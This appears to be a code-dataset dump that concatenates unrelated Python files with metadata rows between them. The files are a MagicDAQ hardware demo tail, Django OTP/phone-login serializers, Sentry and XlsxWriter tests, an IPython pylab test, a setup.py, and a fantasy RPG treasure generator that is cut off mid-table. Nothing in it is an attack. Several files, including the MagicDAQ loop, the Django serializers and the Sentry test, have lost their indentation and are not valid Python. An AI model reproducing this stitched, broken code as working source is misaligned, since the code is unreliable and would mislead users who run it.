print('Please consult MagicDAQ API Docs: https://magicdaq.github.io/magicdaq_docs/#/Install_MagicDAQ')
print('Feel free to email MagicDAQ Support at: support@magicdaq.com')
sys.exit(0)
##############################################################
#*** MagicDAQ USB DAQ MDAQ300 Features Demo ***
##############################################################
# This portion of the script shows off some of the USB DAQ's features
# Hardware docs: https://www.magicdaq.com/product/magic-daq/
print('')
print('*** MagicDAQ USB DAQ Demo ***')
print('Ensure the USB DAQ is plugged into the computer using the USB cable.')
print('The DAQ does not need to be connected to the M&A board.')
print('')
user_input = input('Press any key to continue.')
#*** Open DAQ Device ***
# Remember, the daq_one object has already been created in the above 'Imports' section
# We must open the daq device before performing any hardware feature manipulation
# https://magicdaq.github.io/magicdaq_docs/#/MagicDAQ_Basics
daq_one.open_daq_device()
###############################################################
#*** Analog Output Demo: Constant, Sine, and PWM on AO1 Pin ***
###############################################################
print('')
print('--- Analog Output Demo: Constant, Sine, and PWM Output ---')
# Set constant 3 volt output voltage on AO1 pin
daq_one.set_analog_output(1,3)
print('Using an oscilloscope, place the scope probe on pin AO1 and connect the scope probe GND to one of the USB DAQs AGND pins')
print('You should now observe a constant 3V')
print('')
user_input = input('Press any key to continue.')
# Configure and start 300Hz sine wave with 2V amplitude on AO1 pin
daq_one.configure_analog_output_sine_wave(1,300,amplitude=2)
daq_one.start_analog_output_wave(1)
print('You should now observe a 300Hz sine wave with 2V amplitude.')
print('')
user_input = input('Press any key to continue.')
# Stop previous wave
daq_one.stop_analog_output_wave(1)
# Configure and start PWM wave, 200 Hz, 50% duty cycle, 3.3V amplitude
daq_one.configure_analog_output_pwm_wave(1,200,50,amplitude=3.3)
daq_one.start_analog_output_wave(1)
print('You should now observe a 200Hz PWM wave, 50% duty cycle, with 3.3V amplitude.')
print('')
user_input = input('Press any key to continue.')
# Stop the wave
daq_one.stop_analog_output_wave(1)
print('The wave should now stop. You could set it to GND using set_analog_ouput() if you wanted.')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Pulse Counter Pin Demo: PWM waves ***
###############################################################
print('')
print('--- Pulse Counter Pin Demo: PWM Waves ---')
# Configure a 50 KHz frequency, 75% duty cycle, continuous PWM Wave on the counter pin (CTR0)
# Note that unlike the analog output pins, the CTR0 pin always outputs at an amplitude of 3.3v when producing PWM waves
daq_one.configure_counter_pwm(50000,75)
# Start counter wave
daq_one.start_counter_pwm()
print('Place your scope probe on pin CTR0')
print('You should see a 50kHz, 75% duty cycle PWM wave.')
print('')
user_input = input('Press any key to continue.')
# Now stopping the counter PWM wave
daq_one.stop_counter_pwm()
print('The PWM wave will now stop.')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Pulse Counter Pin Demo: Pulse Counting ***
###############################################################
print('')
print('--- Pulse Counter Pin Demo: Pulse Counting ---')
print('Use a piece of wire to bridge CTR0 to DGND several times')
print('CTR0 has an internal pull up resistor. You are simulating a pulse pulling the voltage to GND.')
print('You will have 8 sec to simulate some pulses.')
print('')
user_input = input('Press any key when you are ready to start.')
# Start the Pulse Counter
# Pulses will be counted on the falling edge
daq_one.enable_pulse_counter()
# Sleep for 8 sec
time.sleep(8)
# Read number of pulses
print('Number of pulses counted: '+str(daq_one.read_pulse_counter()))
print('You are using a piece of wire, so it is likely bouncing on and off the screw terminal, counting many pulses')
print('')
user_input = input('Stop simulating pulses. Press any key to continue.')
print('')
print('Now clearing the pulse counter')
daq_one.clear_pulse_counter()
print('Pulse count after clearing: '+str(daq_one.read_pulse_counter()))
###############################################################
#*** Digital Pin Demo ***
###############################################################
print('')
print('--- Digital Pin Demo ---')
# Set P0.0 pin LOW
daq_one.set_digital_output(0,0)
print('Place scope probe on pin P0.0, pin should be LOW')
print('')
user_input = input('Press any key to continue.')
# Set P0.0 pin HIGH
daq_one.set_digital_output(0,1)
print('Place scope probe on pin P0.0, pin should be HIGH')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Analog Input Pin Demo ***
###############################################################
print('')
print('--- Analog Input Pin Demo ---')
# Single ended voltage measurement
print('Apply voltage to AI0 pin. If you dont have a power supply handy, you can run a wire from the +5V pin to the AI0 pin.')
print('')
user_input = input('Press any key to continue.')
print('Voltage measured at AI0: '+str(daq_one.read_analog_input(0)))
print('If you are using the +5V pin, remember that this voltage is derived from the USB Power supply, so it will be what ever your USB bus ir producing, probably something slightly less than 5V.')
# If you want to perform a differential input measurement
# daq_one.read_diff_analog_input()
# https://magicdaq.github.io/magicdaq_docs/#/read_diff_analog_input
###############################################################
#*** M&A Board Demo ***
###############################################################
# M&A Board hardware spec:
# https://www.magicdaq.com/product/ma-board-full-kit/
print('')
print('*** M&A Board Demo ***')
print('Ensure the USB DAQ is connected to the M&A board using the ribbon cable.')
print('Ribbon cable pin out on page 6 of: ')
print('https://www.magicdaq.com/mdaq350datasheet/')
print('Use the provided power cable to apply power to the M&A board.')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Relay Demo ***
###############################################################
print('')
print('--- Relay Demo ---')
print('Setting all relays to closed.')
daq_one.set_digital_output(7, 1)
daq_one.set_digital_output(6, 1)
daq_one.set_digital_output(5, 1)
daq_one.set_digital_output(4, 1)
time.sleep(1)
relay_count = 1
digital_pin_count = 7
while relay_count <= 4:
print('Relay #: ' + str(relay_count) + ' Digital Pin #: ' + str(digital_pin_count))
# Set relay to open
print('Setting relay to OPEN.')
daq_one.set_digital_output(digital_pin_count, 0)
time.sleep(1)
# Increment counters
relay_count += 1
digital_pin_count -= 1
print('')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Vout Demo ***
###############################################################
print('')
print('--- Vout Demo ---')
print('Vout provides a variable voltage power output capable of up to 2A')
print('By characterizing your M&A board, or building a feedback loop; voltage accuracy of Vout can be made quite good.')
print('See notes on page 4 of the M&A data sheet.')
print('https://www.magicdaq.com/mdaq350datasheet/')
# See the M&A board data sheet for the equation that describes the Vout to Vout_set (0 and 2.77 here) relationship
print('')
print('Vout_set Set to 0V.')
print('Measure Vout with a multimeter. It should be about 10V')
daq_one.set_analog_output(0, 0)
print('')
user_input = input('Press any key to continue.')
print('Vout_set Set to 2.77V')
print('Measure Vout with a multimeter. It should be about 5V')
daq_one.set_analog_output(0, 2.77)
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Low Current Measurement Demo: A1 ***
###############################################################
print('')
print('--- A1 Low Current Measurement Demo ---')
print('Use the 3.3V board voltage and a 20K resistor to put 165uA through A1.')
print('')
user_input = input('Press any key to continue.')
# See the M&A board data sheet for the equation that describes the Vout to current relationship
pin_4_voltage = daq_one.read_analog_input(4)
print('Read voltage: ' + str(pin_4_voltage))
calculated_current_amps = pin_4_voltage / (332 * 97.863)
ua_current = round((calculated_current_amps / .000001), 3)
print('Calculated uA current: ' + str(ua_current))
###############################################################
#*** Current Measurement Demo: A2 ***
###############################################################
print('')
print('--- A2 Current Measurement Demo (+/- 5A max) ---')
print('Use an external 5V power supply and 5 ohm power resistor to put 1 Amp through A2.')
print('')
user_input = input('Press any key to continue.')
# See the M&A board data sheet for the equation that describes the Vout to current relationship
pin_5_voltage = daq_one.read_analog_input(5)
print('Read voltage: ' + str(pin_5_voltage))
calculated_current_amps = pin_5_voltage / (.01 * 200)
# ma_current = round((calculated_current_amps / .001), 3)
print('Calculated A current: ' + str(calculated_current_amps))
###############################################################
#*** Current Measurement Demo: A3 ***
###############################################################
print('')
print('--- A3 Current Measurement Demo (+/- 1.5A max) ---')
print('Use an external 5V power supply and 5 ohm power resistor to put 1 Amp through A3.')
print('')
user_input = input('Press any key to continue.')
# See the M&A board data sheet for the equation that describes the Vout to current relationship
pin_6_voltage = daq_one.read_analog_input(6)
print('Read voltage: ' + str(pin_6_voltage))
calculated_current_amps = pin_6_voltage / (.033 * 200)
ma_current = round((calculated_current_amps / .001), 3)
print('Calculated mA current: ' + str(ma_current))
###############################################################
#*** Demo Complete. ***
###############################################################
# Close connection to daq
daq_one.close_daq_device()
| 34.342246 | 196 | 0.617642 | 1,740 | 12,844 | 4.445402 | 0.201149 | 0.026374 | 0.034389 | 0.046671 | 0.434131 | 0.374014 | 0.287524 | 0.256238 | 0.242017 | 0.203749 | 0 | 0.019084 | 0.135083 | 12,844 | 373 | 197 | 34.434316 | 0.677199 | 0.236998 | 0 | 0.357955 | 0 | 0.028409 | 0.518131 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022727 | 0 | 0.022727 | 0.613636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
c7e32e60b520a7528f6c33e61490ce039febd1e0 | 2,257 | py | Python | src/account/api/serializers.py | amirpsd/drf_blog_api | 58be081a450840114af021e7412e469fad90456d | [
"MIT"
] | 33 | 2022-02-11T12:16:29.000Z | 2022-03-26T15:08:47.000Z | src/account/api/serializers.py | amirpsd/django_blog_api | 58be081a450840114af021e7412e469fad90456d | [
"MIT"
] | null | null | null | src/account/api/serializers.py | amirpsd/django_blog_api | 58be081a450840114af021e7412e469fad90456d | [
"MIT"
] | 5 | 2022-02-11T13:03:52.000Z | 2022-03-28T16:04:32.000Z | from django.contrib.auth import get_user_model
from rest_framework import serializers
class UsersListSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = [
"id", "phone",
"first_name", "last_name",
"author",
]
class UserDetailUpdateDeleteSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
exclude = [
"password",
]
class UserProfileSerializer(serializers.ModelSerializer):
phone = serializers.ReadOnlyField()
class Meta:
model = get_user_model()
fields = [
"id", "phone",
"first_name", "last_name",
"two_step_password",
]
class AuthenticationSerializer(serializers.Serializer):
phone = serializers.CharField(
max_length=12,
min_length=12,
)
def validate_phone(self, value):
from re import match
if not match("^989\d{2}\s*?\d{3}\s*?\d{4}$", value):
raise serializers.ValidationError("Invalid phone number.")
return value
class OtpSerializer(serializers.Serializer):
code = serializers.CharField(
max_length=6,
min_length=6,
)
password = serializers.CharField(
max_length=20,
required=False,
)
def validate_code(self, value):
try:
int(value)
except ValueError as _:
raise serializers.ValidationError("Invalid Code.")
return value
class GetTwoStepPasswordSerializer(serializers.Serializer):
"""
Base serializer two-step-password.
"""
password = serializers.CharField(
max_length=20,
)
confirm_password = serializers.CharField(
max_length=20,
)
def validate(self, data):
password = data.get('password')
confirm_password = data.get('confirm_password')
if password != confirm_password:
raise serializers.ValidationError(
{"Error": "Your passwords didn't match."}
)
return data
class ChangeTwoStepPasswordSerializer(GetTwoStepPasswordSerializer):
old_password = serializers.CharField(
max_length=20,
)
| 23.030612 | 70 | 0.613646 | 209 | 2,257 | 6.478469 | 0.368421 | 0.088626 | 0.10192 | 0.128508 | 0.255539 | 0.255539 | 0.140325 | 0.140325 | 0.082718 | 0.082718 | 0 | 0.012492 | 0.290651 | 2,257 | 97 | 71 | 23.268041 | 0.833229 | 0.015064 | 0 | 0.289855 | 0 | 0 | 0.091693 | 0.01271 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.173913 | 0.043478 | 0 | 0.376812 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c7e62258b56e4e6157b37bc5877b4350133a63c1 | 1,676 | py | Python | tests/sentry/api/serializers/test_saved_search.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 4 | 2019-05-27T13:55:07.000Z | 2021-03-30T07:05:09.000Z | tests/sentry/api/serializers/test_saved_search.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 99 | 2019-05-20T14:16:33.000Z | 2021-01-19T09:25:15.000Z | tests/sentry/api/serializers/test_saved_search.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 1 | 2020-08-10T07:55:40.000Z | 2020-08-10T07:55:40.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.models import SavedSearch
from sentry.models.savedsearch import DEFAULT_SAVED_SEARCHES
from sentry.testutils import TestCase
class SavedSearchSerializerTest(TestCase):
def test_simple(self):
search = SavedSearch.objects.create(
project=self.project,
name='Something',
query='some query'
)
result = serialize(search)
assert result['id'] == six.text_type(search.id)
assert result['projectId'] == six.text_type(search.project_id)
assert result['name'] == search.name
assert result['query'] == search.query
assert result['isDefault'] == search.is_default
assert result['isUserDefault'] == search.is_default
assert result['dateCreated'] == search.date_added
assert not result['isPrivate']
assert not result['isGlobal']
def test_global(self):
default_saved_search = DEFAULT_SAVED_SEARCHES[0]
search = SavedSearch(
name=default_saved_search['name'],
query=default_saved_search['query'],
is_global=True,
)
result = serialize(search)
assert result['id'] == six.text_type(search.id)
assert result['projectId'] is None
assert result['name'] == search.name
assert result['query'] == search.query
assert not result['isDefault']
assert not result['isUserDefault']
assert result['dateCreated'] == search.date_added
assert not result['isPrivate']
assert result['isGlobal']
| 33.52 | 70 | 0.648568 | 182 | 1,676 | 5.82967 | 0.285714 | 0.147031 | 0.070688 | 0.048068 | 0.422243 | 0.382658 | 0.382658 | 0.382658 | 0.382658 | 0.382658 | 0 | 0.00158 | 0.24463 | 1,676 | 49 | 71 | 34.204082 | 0.836493 | 0.01253 | 0 | 0.3 | 0 | 0 | 0.101633 | 0 | 0 | 0 | 0 | 0 | 0.45 | 1 | 0.05 | false | 0 | 0.15 | 0 | 0.225 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7e63e3b77d732305764d664c862b2625865bf3a | 864 | py | Python | xastropy/files/general.py | bpholden/xastropy | 66aff0995a84c6829da65996d2379ba4c946dabe | [
"BSD-3-Clause"
] | 3 | 2015-08-23T00:32:58.000Z | 2020-12-31T02:37:52.000Z | xastropy/files/general.py | Kristall-WangShiwei/xastropy | 723fe56cb48d5a5c4cdded839082ee12ef8c6732 | [
"BSD-3-Clause"
] | 104 | 2015-07-17T18:31:54.000Z | 2018-06-29T17:04:09.000Z | xastropy/files/general.py | Kristall-WangShiwei/xastropy | 723fe56cb48d5a5c4cdded839082ee12ef8c6732 | [
"BSD-3-Clause"
] | 16 | 2015-07-17T15:50:37.000Z | 2019-04-21T03:42:47.000Z | """
#;+
#; NAME:
#; general
#; Version 1.0
#;
#; PURPOSE:
#; Module for monkeying with files and filenames
#; 172Sep-2014 by JXP
#;-
#;------------------------------------------------------------------------------
"""
# Import libraries
import numpy as np
from astropy.io import fits
from astropy.io import ascii
import os, pdb
#### ###############################
# Deal with .gz extensions, usually on FITS files
# See if filenm exists, if so pass it back
#
def chk_for_gz(filenm,chk=None):
import os, pdb
# File exist?
if os.path.lexists(filenm):
chk=1
return filenm, chk
# .gz already
if filenm.find('.gz') > 0:
chk=0
return filenm, chk
# Add .gz
if os.path.lexists(filenm+'.gz'):
chk=1
return filenm+'.gz', chk
else:
chk=0
return filenm, chk
| 19.2 | 80 | 0.508102 | 107 | 864 | 4.084112 | 0.504673 | 0.102975 | 0.102975 | 0.086957 | 0.183066 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021841 | 0.258102 | 864 | 44 | 81 | 19.636364 | 0.659906 | 0.417824 | 0 | 0.5 | 0 | 0 | 0.019824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.277778 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7e69418daeb84532c16aa76c96e7a0136b72521 | 655 | py | Python | setup.py | muatik/genderizer | 9866bf0371d1d984f6c4465ff78025d911f6a648 | [
"MIT"
] | 54 | 2015-01-19T22:53:48.000Z | 2021-06-23T03:48:05.000Z | setup.py | nejdetckenobi/genderizer | 9866bf0371d1d984f6c4465ff78025d911f6a648 | [
"MIT"
] | 4 | 2016-05-23T13:52:12.000Z | 2021-05-14T10:24:37.000Z | setup.py | nejdetckenobi/genderizer | 9866bf0371d1d984f6c4465ff78025d911f6a648 | [
"MIT"
] | 18 | 2015-01-30T00:06:40.000Z | 2021-03-12T14:56:12.000Z | #!/usr/bin/env python
try:
from setuptools.core import setup
except ImportError:
from distutils.core import setup
setup(name='genderizer',
version='0.1.2.3',
license='MIT',
description='Genderizer tries to infer gender information looking at first name and/or making text analysis',
long_description=open('README.md').read(),
url='https://github.com/muatik/genderizer',
author='Mustafa Atik',
author_email='muatik@gmail.com',
maintainer='Mustafa Atik',
maintainer_email='muatik@gmail.com',
packages=['genderizer'],
package_data={'genderizer': ['data/*']},
platforms='any') | 31.190476 | 115 | 0.668702 | 79 | 655 | 5.493671 | 0.721519 | 0.046083 | 0.069124 | 0.087558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007533 | 0.189313 | 655 | 21 | 116 | 31.190476 | 0.809793 | 0.030534 | 0 | 0 | 0 | 0 | 0.384252 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.176471 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7eb49aae87e95e2b4d243e5c05c7251bfbcbd52 | 2,508 | py | Python | xlsxwriter/test/worksheet/test_write_print_options.py | Aeon1/XlsxWriter | 6871b6c3fe6c294632054ea91f23d9e27068bcc1 | [
"BSD-2-Clause-FreeBSD"
] | 2 | 2019-07-25T06:08:09.000Z | 2019-11-01T02:33:56.000Z | xlsxwriter/test/worksheet/test_write_print_options.py | Aeon1/XlsxWriter | 6871b6c3fe6c294632054ea91f23d9e27068bcc1 | [
"BSD-2-Clause-FreeBSD"
] | 13 | 2019-07-14T00:29:05.000Z | 2019-11-26T06:16:46.000Z | xlsxwriter/test/worksheet/test_write_print_options.py | Aeon1/XlsxWriter | 6871b6c3fe6c294632054ea91f23d9e27068bcc1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestWritePrintOptions(unittest.TestCase):
"""
Test the Worksheet _write_print_options() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_print_options_default(self):
"""Test the _write_print_options() method without options"""
self.worksheet._write_print_options()
exp = """"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_hcenter(self):
"""Test the _write_print_options() method with horizontal center"""
self.worksheet.center_horizontally()
self.worksheet._write_print_options()
exp = """<printOptions horizontalCentered="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_vcenter(self):
"""Test the _write_print_options() method with vertical center"""
self.worksheet.center_vertically()
self.worksheet._write_print_options()
exp = """<printOptions verticalCentered="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_center(self):
"""Test the _write_print_options() method with horiz + vert center"""
self.worksheet.center_horizontally()
self.worksheet.center_vertically()
self.worksheet._write_print_options()
exp = """<printOptions horizontalCentered="1" verticalCentered="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_gridlines_default(self):
"""Test the _write_print_options() method with default value"""
self.worksheet.hide_gridlines()
self.worksheet._write_print_options()
exp = """"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_gridlines_0(self):
"""Test the _write_print_options() method with 0 value"""
self.worksheet.hide_gridlines(0)
self.worksheet._write_print_options()
exp = """<printOptions gridLines="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| 28.179775 | 79 | 0.637161 | 269 | 2,508 | 5.669145 | 0.211896 | 0.12459 | 0.211803 | 0.119344 | 0.748197 | 0.691803 | 0.691803 | 0.61377 | 0.457705 | 0.378361 | 0 | 0.008147 | 0.216906 | 2,508 | 88 | 80 | 28.5 | 0.76833 | 0.192584 | 0 | 0.545455 | 0 | 0 | 0.085488 | 0.047493 | 0 | 0 | 0 | 0 | 0.136364 | 1 | 0.159091 | false | 0 | 0.068182 | 0 | 0.25 | 0.363636 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7f405a9090e4db54d759cf9f413be8921191675 | 3,890 | py | Python | IPython/lib/tests/test_irunner_pylab_magic.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | null | null | null | IPython/lib/tests/test_irunner_pylab_magic.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 3 | 2015-04-01T13:14:57.000Z | 2015-05-26T16:01:37.000Z | IPython/lib/tests/test_irunner_pylab_magic.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 1 | 2021-10-06T07:59:25.000Z | 2021-10-06T07:59:25.000Z | """Test suite for pylab_import_all magic
Modified from the irunner module but using regex.
"""
# Global to make tests extra verbose and help debugging
VERBOSE = True
# stdlib imports
import StringIO
import sys
import unittest
import re
# IPython imports
from IPython.lib import irunner
from IPython.testing import decorators
def pylab_not_importable():
"""Test if importing pylab fails with RuntimeError (true when having no display)"""
try:
import pylab
return False
except RuntimeError:
return True
# Testing code begins
class RunnerTestCase(unittest.TestCase):
def setUp(self):
self.out = StringIO.StringIO()
#self.out = sys.stdout
def _test_runner(self,runner,source,output):
"""Test that a given runner's input/output match."""
runner.run_source(source)
out = self.out.getvalue()
#out = ''
# this output contains nasty \r\n lineends, and the initial ipython
# banner. clean it up for comparison, removing lines of whitespace
output_l = [l for l in output.splitlines() if l and not l.isspace()]
out_l = [l for l in out.splitlines() if l and not l.isspace()]
mismatch = 0
if len(output_l) != len(out_l):
message = ("Mismatch in number of lines\n\n"
"Expected:\n"
"~~~~~~~~~\n"
"%s\n\n"
"Got:\n"
"~~~~~~~~~\n"
"%s"
) % ("\n".join(output_l), "\n".join(out_l))
self.fail(message)
for n in range(len(output_l)):
# Do a line-by-line comparison
ol1 = output_l[n].strip()
ol2 = out_l[n].strip()
if not re.match(ol1,ol2):
mismatch += 1
if VERBOSE:
print '<<< line %s does not match:' % n
print repr(ol1)
print repr(ol2)
print '>>>'
self.assert_(mismatch==0,'Number of mismatched lines: %s' %
mismatch)
@decorators.skipif_not_matplotlib
@decorators.skipif(pylab_not_importable, "Likely a run without X.")
def test_pylab_import_all_enabled(self):
"Verify that plot is available when pylab_import_all = True"
source = """
from IPython.config.application import Application
app = Application.instance()
app.pylab_import_all = True
pylab
ip=get_ipython()
'plot' in ip.user_ns
"""
output = """
In \[1\]: from IPython\.config\.application import Application
In \[2\]: app = Application\.instance\(\)
In \[3\]: app\.pylab_import_all = True
In \[4\]: pylab
^Welcome to pylab, a matplotlib-based Python environment
For more information, type 'help\(pylab\)'\.
In \[5\]: ip=get_ipython\(\)
In \[6\]: \'plot\' in ip\.user_ns
Out\[6\]: True
"""
runner = irunner.IPythonRunner(out=self.out)
self._test_runner(runner,source,output)
@decorators.skipif_not_matplotlib
@decorators.skipif(pylab_not_importable, "Likely a run without X.")
def test_pylab_import_all_disabled(self):
"Verify that plot is not available when pylab_import_all = False"
source = """
from IPython.config.application import Application
app = Application.instance()
app.pylab_import_all = False
pylab
ip=get_ipython()
'plot' in ip.user_ns
"""
output = """
In \[1\]: from IPython\.config\.application import Application
In \[2\]: app = Application\.instance\(\)
In \[3\]: app\.pylab_import_all = False
In \[4\]: pylab
^Welcome to pylab, a matplotlib-based Python environment
For more information, type 'help\(pylab\)'\.
In \[5\]: ip=get_ipython\(\)
In \[6\]: \'plot\' in ip\.user_ns
Out\[6\]: False
"""
runner = irunner.IPythonRunner(out=self.out)
self._test_runner(runner,source,output)
| 32.689076 | 87 | 0.608226 | 501 | 3,890 | 4.608782 | 0.289421 | 0.042876 | 0.054569 | 0.048506 | 0.522304 | 0.466869 | 0.466869 | 0.443482 | 0.443482 | 0.443482 | 0 | 0.008084 | 0.268638 | 3,890 | 118 | 88 | 32.966102 | 0.803515 | 0.075578 | 0 | 0.446809 | 0 | 0 | 0.392017 | 0.072684 | 0 | 0 | 0 | 0 | 0.010638 | 0 | null | null | 0 | 0.234043 | null | null | 0.042553 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1be2fe74c868aa22cedb699484c807fd62b32107 | 14,174 | py | Python | Dungeoneer/Treasure.py | jameslemon81/Dungeoneer | 8a2a1bfea06ae09f1898583999bf449c82ba4ce9 | [
"BSD-3-Clause"
] | 12 | 2015-01-29T17:15:46.000Z | 2022-02-23T05:58:49.000Z | Dungeoneer/Treasure.py | jameslemon81/Dungeoneer | 8a2a1bfea06ae09f1898583999bf449c82ba4ce9 | [
"BSD-3-Clause"
] | null | null | null | Dungeoneer/Treasure.py | jameslemon81/Dungeoneer | 8a2a1bfea06ae09f1898583999bf449c82ba4ce9 | [
"BSD-3-Clause"
] | 8 | 2016-07-04T18:09:50.000Z | 2022-02-23T05:58:48.000Z | # Basic Fantasy RPG Dungeoneer Suite
# Copyright 2007-2012 Chris Gonnerman
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, self list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, self list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# Neither the name of the author nor the names of any contributors
# may be used to endorse or promote products derived from self software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
# Treasure.py -- generate treasures for Basic Fantasy RPG
###############################################################################
import Gems, Art, Coins, Magic, Unknown
import Dice
import string
def combine(lst):
lst.sort()
hits = 1
while hits:
hits = 0
for i in range(len(lst) - 1):
if lst[i] is not None and lst[i+1] is not None:
if lst[i].cat == lst[i+1].cat \
and lst[i].name == lst[i+1].name \
and lst[i].value == lst[i+1].value:
lst[i].qty += lst[i+1].qty
lst[i+1] = None
hits += 1
if hits:
lst = filter(lambda x: x is not None, lst)
return lst
def _gen_coins(argtup):
kind, n, s, b, mul = argtup
return [ Coins.Coin(kind, (Dice.D(n, s, b) * mul)) ]
def _gen_gems(argtup):
n, s, b, mul = argtup
lst = []
qty = Dice.D(n, s, b) * mul
for i in range(qty):
lst = lst + [ Gems.Gem() ]
return lst
def _gen_art(argtup):
n, s, b, mul = argtup
lst = []
qty = Dice.D(n, s, b) * mul
for i in range(qty):
lst = lst + [ Art.Art() ]
return lst
def __gen_magic(argtup):
kind, n, s, b, mul = argtup
lst = []
qty = Dice.D(n, s, b) * mul
for i in range(qty):
lst = lst + [ Magic.Magic(kind) ]
return lst
def _gen_magic(argtup):
if type(argtup) is type([]):
lst = []
for i in argtup:
lst = lst + __gen_magic(i)
return lst
else:
return __gen_magic(argtup)
_treasure_table = {
# lair treasure
'A': [
(50, _gen_coins, ("cp", 5, 6, 0, 100)),
